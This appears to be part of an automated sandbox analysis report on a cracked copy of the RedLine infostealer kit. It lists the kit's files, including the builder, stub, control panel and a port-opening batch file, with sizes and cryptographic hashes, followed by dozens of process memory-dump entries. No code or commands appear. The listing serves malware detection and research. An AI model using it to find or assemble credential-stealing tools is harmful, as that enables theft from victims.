c38b0b08e7d37f31ab4331fcc54033ec181dc399e39df602869846f53e3dc006425a81b7b08f352c5e54501e247657364dfc288085a7c1c552737d4db4f33406

Download Submit
C:\Users\Admin\Desktop\RedLine Stealer Cracked\Libraries\Newtonsoft.Json.dll

Filesize
683KB

MD5
6815034209687816d8cf401877ec8133

SHA1
1248142eb45eed3beb0d9a2d3b8bed5fe2569b10

SHA256
7f912b28a07c226e0be3acfb2f57f050538aba0100fa1f0bf2c39f1a1f1da814

SHA512
3398094ce429ab5dcdecf2ad04803230669bb4accaef7083992e9b87afac55841ba8def2a5168358bd17e60799e55d076b0e5ca44c86b9e6c91150d3dc37c721

Download Submit
C:\Users\Admin\Desktop\RedLine Stealer Cracked\Libraries\RedLine.SharedModels.dll

Filesize
29KB

MD5
bee2969583715bfa584d073ac8d98c42

SHA1
37d1221ce6bb82e7ad08fd22bd13592815a23468

SHA256
5f92db78e43986f063632fb2cfafdce73e5e7e64979900783ca9a00016933375

SHA512
5c139b81a51477d8362be2bf72b9f2425d54ef67b4ad715fbe8aa11f8a57435abb7f23a7ecaee18611e559d1006c0df5dd3427b6e7c3caed38d8cffd79e4bb1c

Download Submit
C:\Users\Admin\Desktop\RedLine Stealer Cracked\Libraries\System.Drawing.Pen.dll

Filesize
2.7MB

MD5
1d4e91345a76c90e0849c9389e66fe8c

SHA1
744393f64d9f95a987605ac14b721dbbc985901c

SHA256
1d820d1c1e9d661603cd32177fb128c9a6844fe2492b6fbb3120bd37553663b0

SHA512
e0c5fa5c9141e139d529b80058c1ff8fb252116076c57fbea106ee2500cb23d3a91b76f6348bc0bcf465acde510463352a960eefd29198f4068661342cbd28b8

Download Submit
C:\Users\Admin\Desktop\RedLine Stealer Cracked\Libraries\builder.exe

Filesize
33KB

MD5
2d6ac27235e545727f1c543cbcb4c606

SHA1
6163fc890a58102a47a8c799adb2e8ed0fa4536e

SHA256
615aa9b90fb40c052eea89f0b273ed0bc5a4ab218783d30f00ecd72d56b08a25

SHA512
7336c57706f071b5a806baae01fe049976081e1f7643c4f61193f37d62192bd950e1712e9ee864e3bed9246361d46f9581b6314771242299c102e2e43ad2049a

Download Submit
C:\Users\Admin\Desktop\RedLine Stealer Cracked\Libraries\builder.pdb

Filesize
33KB

MD5
418dc008ef956465e179ec29d3c3c245

SHA1
4960b2952c6cc8de2295f145c3a4526bf6d1a391

SHA256
8c7e21b37540211d56c5fdbb7e731655a96945aa83f2988e33d5adb8aa7c8df1

SHA512
ad386b6cf99682d117dce3a38c37f45843ac87d9ad17608453c0dfe8dd2b74c0c19c46a35da8140dc3ffc61d2333d78ab1438723cfd74aac585c39f0f59542f2

Download Submit
C:\Users\Admin\Desktop\RedLine Stealer Cracked\Libraries\links.txt

Filesize
1KB

MD5
7e0b0f449c419bc5dce0a9ae1920c00c

SHA1
f36d4c8d25b082811e54e4c07f66b09dffc7c981

SHA256
2ca989920e2cd5c250be6fb5e0ef82ee45a77f2147e91d736562c110b5ec372e

SHA512
af229aa9d53c197e66aea3a66d1bf210f4fe0a9bdf0c8e17e4c2b8e1951a68ee55dd859313f6872ba10b289752f390901b9301525bd0ff93079f5b0ce4cbaeb1

Download Submit
C:\Users\Admin\Desktop\RedLine Stealer Cracked\Libraries\protobuf-net.dll

Filesize
274KB

MD5
d16fffeb71891071c1c5d9096ba03971

SHA1
24c2c7a0d6c9918f037393c2a17e28a49d340df1

SHA256
141b235af8ebf25d5841edee29e2dcf6297b8292a869b3966c282da960cbd14d

SHA512
27fb5b77fcadbe7bd1af51f7f40d333cd12de65de12e67aaea4e5f6c0ac2a62ee65bdafb1dbc4e3c0a0b9a667b056c4c7d984b4eb1bf4b60d088848b2818d87a

Download Submit
C:\Users\Admin\Desktop\RedLine Stealer Cracked\Libraries\stub.exe

Filesize
229KB

MD5
d90f058e42618ed7cfecd1b0f2c7a2f7

SHA1
6bc8f8b727164efd24972fabf82a0d74021d5e31

SHA256
6ac42ca465daa12786270a6a6378413e8b85829ab024757d2f7e65edea9e5090

SHA512
9166280987fd9e506fccd9a66e8731740cf5f993e8b3abff078a95f7c7f88b242640ea224762cd02f9237ded38ff5816c53331417b0e411c4a05c8c548059021

Download Submit
C:\Users\Admin\Desktop\RedLine Stealer Cracked\OpenPort.bat

Filesize
94B

MD5
cf1cc90281e28cee22dce7ed013c2678

SHA1
2f213a71b76db3e51ad2d659f84dc1f3f90725fb

SHA256
84399f8bccefa404e156a5351b1de75a2d5290b4fddd1754efb16401ed7218ef

SHA512
2b61c1da7cc66506537719cedab82f172d2ac1af4df69513ba64507a5ed67989974f81791faf08c5855580df53f564600381be34c340b825f1f01919948921e1

Download Submit
C:\Users\Admin\Desktop\RedLine Stealer Cracked\RedLine.MainPanel-cracked.exe

Filesize
8.2MB

MD5
93303a9651264375b138eda4afa94374

SHA1
e7eba98dd3a4f6062aaa4d8af45a09b3cc6bbc78

SHA256
0b905118e9d4781720588e5519d5076b7fb023044b8f6bd4f51a1735e2788b61

SHA512
81a3169a8b47adf47414d5e5b4f7627a7be99bcaece3c6db5f391ae7b81b513667df898d7e073cc2ba7e5af128b8f799cc5c2327a0f87e9f51cf3c8eed24892b

Download Submit
memory/1240-235-0x0000000000400000-0x0000000000C36000-memory.dmp

Filesize
8.2MB

Download
memory/2004-559-0x0000000000F30000-0x0000000000F3E000-memory.dmp

Filesize
56KB

Download
memory/2004-586-0x000000001E690000-0x000000001E6EA000-memory.dmp

Filesize
360KB

Download
memory/2968-556-0x000000000AE90000-0x000000000AF9A000-memory.dmp

Filesize
1.0MB

Download
memory/2968-331-0x0000000005D60000-0x0000000006010000-memory.dmp

Filesize
2.7MB

Download
memory/2968-280-0x00000000059C0000-0x0000000005A70000-memory.dmp

Filesize
704KB

Download
memory/2968-270-0x00000000057D0000-0x00000000057EC000-memory.dmp

Filesize
112KB

Download
memory/2968-284-0x0000000005960000-0x00000000059AA000-memory.dmp

Filesize
296KB

Download
memory/2968-288-0x0000000005800000-0x000000000580E000-memory.dmp

Filesize
56KB

Download
memory/2968-264-0x00000000057A0000-0x00000000057B0000-memory.dmp

Filesize
64KB

Download
memory/2968-667-0x0000000001390000-0x000000000142C000-memory.dmp

Filesize
624KB

Download
memory/2968-251-0x0000000005740000-0x0000000005752000-memory.dmp

Filesize
72KB

Download
memory/2968-236-0x0000000000920000-0x00000000009C4000-memory.dmp

Filesize
656KB

Download
memory/2968-247-0x0000000005760000-0x000000000579E000-memory.dmp

Filesize
248KB

Download
memory/2968-335-0x00000000065C0000-0x0000000006B64000-memory.dmp

Filesize
5.6MB

Download
memory/2968-336-0x0000000005B90000-0x0000000005C22000-memory.dmp

Filesize
584KB

Download
memory/2968-337-0x0000000007190000-0x00000000077A8000-memory.dmp

Filesize
6.1MB

Download
memory/2968-338-0x0000000006040000-0x000000000604A000-memory.dmp

Filesize
40KB

Download
memory/2968-242-0x00000000052C0000-0x00000000052CE000-memory.dmp

Filesize
56KB

Download
memory/2968-256-0x0000000005820000-0x0000000005894000-memory.dmp

Filesize
464KB

Download
memory/2968-260-0x00000000058A0000-0x00000000058FA000-memory.dmp

Filesize
360KB

Download
memory/2968-292-0x0000000005A70000-0x0000000005AB0000-memory.dmp

Filesize
256KB

Download
memory/2968-334-0x0000000005930000-0x000000000594A000-memory.dmp

Filesize
104KB

Download
memory/2968-557-0x000000000AE00000-0x000000000AE28000-memory.dmp

Filesize
160KB

Download
memory/2968-558-0x000000000B2E0000-0x000000000B330000-memory.dmp

Filesize
320KB

Download
memory/2968-555-0x000000000A530000-0x000000000A57C000-memory.dmp

Filesize
304KB

Download
memory/2968-554-0x000000000A4F0000-0x000000000A52C000-memory.dmp

Filesize
240KB

Download
memory/2968-553-0x000000000A2C0000-0x000000000A2D2000-memory.dmp

Filesize
72KB

Download
memory/2968-275-0x00000000057B0000-0x00000000057BE000-memory.dmp

Filesize
56KB

Download
memory/3920-537-0x00007FF95A9A0000-0x00007FF95AF89000-memory.dmp

Filesize
5.9MB

Download
memory/3920-583-0x00007FF96DF10000-0x00007FF96DF1D000-memory.dmp

Filesize
52KB

Download
memory/3920-332-0x00007FF96E440000-0x00007FF96E44F000-memory.dmp

Filesize
60KB

Download
memory/3920-330-0x00007FF95A9A0000-0x00007FF95AF89000-memory.dmp

Filesize
5.9MB

Download
memory/3920-345-0x00007FF95A7F0000-0x00007FF95A813000-memory.dmp

Filesize
140KB

Download
memory/3920-516-0x00007FF95A9A0000-0x00007FF95AF89000-memory.dmp

Filesize
5.9MB

Download
memory/3920-543-0x00007FF95A670000-0x00007FF95A7E7000-memory.dmp

Filesize
1.5MB

Download
memory/3920-552-0x00007FF96D3D0000-0x00007FF96D3F3000-memory.dmp

Filesize
140KB

Download
memory/3920-548-0x00007FF95A020000-0x00007FF95A0ED000-memory.dmp

Filesize
820KB

Download
memory/3920-546-0x00007FF95A610000-0x00007FF95A643000-memory.dmp

Filesize
204KB

Download
memory/3920-544-0x00007FF95A650000-0x00007FF95A669000-memory.dmp

Filesize
100KB

Download
memory/3920-353-0x00007FF96DCA0000-0x00007FF96DCAD000-memory.dmp

Filesize
52KB

Download
memory/3920-542-0x00007FF95A7F0000-0x00007FF95A813000-memory.dmp

Filesize
140KB

Download
memory/3920-547-0x00007FF95A0F0000-0x00007FF95A610000-memory.dmp

Filesize
5.1MB

Download
memory/3920-352-0x00007FF95A000000-0x00007FF95A014000-memory.dmp

Filesize
80KB

Download
memory/3920-350-0x00007FF95A0F0000-0x00007FF95A610000-memory.dmp

Filesize
5.1MB

Download
memory/3920-351-0x00007FF95A020000-0x00007FF95A0ED000-memory.dmp

Filesize
820KB

Download
memory/3920-333-0x00007FF96D3D0000-0x00007FF96D3F3000-memory.dmp

Filesize
140KB

Download
memory/3920-347-0x00007FF95A650000-0x00007FF95A669000-memory.dmp

Filesize
100KB

Download
memory/3920-348-0x00007FF96DF10000-0x00007FF96DF1D000-memory.dmp

Filesize
52KB

Download
memory/3920-349-0x00007FF95A610000-0x00007FF95A643000-memory.dmp

Filesize
204KB

Download
memory/3920-570-0x00007FF95A0F0000-0x00007FF95A610000-memory.dmp

Filesize
5.1MB

Download
memory/3920-584-0x00007FF95A610000-0x00007FF95A643000-memory.dmp

Filesize
204KB

Download
memory/3920-354-0x00007FF959EE0000-0x00007FF959FFC000-memory.dmp

Filesize
1.1MB

Download
memory/3920-582-0x00007FF95A650000-0x00007FF95A669000-memory.dmp

Filesize
100KB

Download
memory/3920-581-0x00007FF95A670000-0x00007FF95A7E7000-memory.dmp

Filesize
1.5MB

Download
memory/3920-580-0x00007FF95A7F0000-0x00007FF95A813000-memory.dmp

Filesize
140KB

Download
memory/3920-579-0x00007FF95A820000-0x00007FF95A839000-memory.dmp

Filesize
100KB

Download
memory/3920-578-0x00007FF95B1C0000-0x00007FF95B1ED000-memory.dmp

Filesize
180KB

Download
memory/3920-577-0x00007FF95A9A0000-0x00007FF95AF89000-memory.dmp

Filesize
5.9MB

Download
memory/3920-576-0x00007FF96E440000-0x00007FF96E44F000-memory.dmp

Filesize
60KB

Download
memory/3920-575-0x00007FF96D3D0000-0x00007FF96D3F3000-memory.dmp

Filesize
140KB

Download
memory/3920-574-0x00007FF959EE0000-0x00007FF959FFC000-memory.dmp

Filesize
1.1MB

Download
memory/3920-573-0x00007FF96DCA0000-0x00007FF96DCAD000-memory.dmp

Filesize
52KB

Download
memory/3920-572-0x00007FF95A000000-0x00007FF95A014000-memory.dmp

Filesize
80KB

Download
memory/3920-571-0x00007FF95A020000-0x00007FF95A0ED000-memory.dmp

Filesize
820KB

Download
memory/3920-343-0x00007FF95B1C0000-0x00007FF95B1ED000-memory.dmp

Filesize
180KB

Download
memory/3920-346-0x00007FF95A670000-0x00007FF95A7E7000-memory.dmp

Filesize
1.5MB

Download
memory/3920-344-0x00007FF95A820000-0x00007FF95A839000-memory.dmp

Filesize
100KB

Download
memory/5172-408-0x0000027B2D090000-0x0000027B2D0B2000-memory.dmp

Filesize
136KB

Download
memory/5184-453-0x0000027D72D20000-0x0000027D737E1000-memory.dmp

Filesize
10.8MB

Download
memory/5964-454-0x000002064CFD0000-0x000002064CFD8000-memory.dmp

Filesize
32KB

Download
memory/6060-611-0x000002B3E2E40000-0x000002B3E2E90000-memory.dmp

Filesize
320KB

Download
memory/6060-612-0x000002B3E2AB0000-0x000002B3E2ACE000-memory.dmp

Filesize
120KB

Download
memory/6060-610-0x000002B3E2D70000-0x000002B3E2DE6000-memory.dmp

Filesize
472KB

Download
memory/6060-589-0x000002B3C8640000-0x000002B3C8680000-memory.dmp

Filesize
256KB

Download
memory/6060-647-0x000002B3E2AF0000-0x000002B3E2AFA000-memory.dmp

Filesize
40KB

Download
memory/6060-648-0x000002B3E2DF0000-0x000002B3E2E02000-memory.dmp

Filesize
72KB

Download